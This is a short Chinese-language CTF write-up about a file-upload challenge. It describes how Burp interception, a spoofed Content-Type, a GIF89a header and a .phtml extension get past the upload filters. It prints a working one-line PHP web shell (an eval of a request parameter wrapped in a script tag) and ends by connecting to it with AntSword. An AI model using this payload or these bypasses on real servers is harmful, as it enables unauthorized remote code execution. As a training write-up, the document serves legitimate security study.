一、题目链接

二、解法步骤

本题是一个文件上传题目，先测试是黑名单还是白名单：随便上传一个文件，提示：

看来只能上传图片类型，这个时候我们bp抓包并且修改包中的content字段，将其改成jpg等格式，同时给文件加上GIF89a来进行欺骗：

修改后直接上传php还是会被检测，那么改成phtml：

发现对文件内容进行了检测，不能有<? 这样php语言的特征，那么换一个一句话木马，用javascript写的：

GIF89a
<script language="php">@eval($_REQUEST['cmd']);</script>一样bp抓包修改content：

上传成功，然后用找到文件的上传目录：一般在upload下面：

最后用蚁剑连接：

最后在根目录下找到flag：

本题文件上传对文件后缀进行了检查，可以用phtml绕过，如果对文件内容进行php特性检查，可以用js语言代替。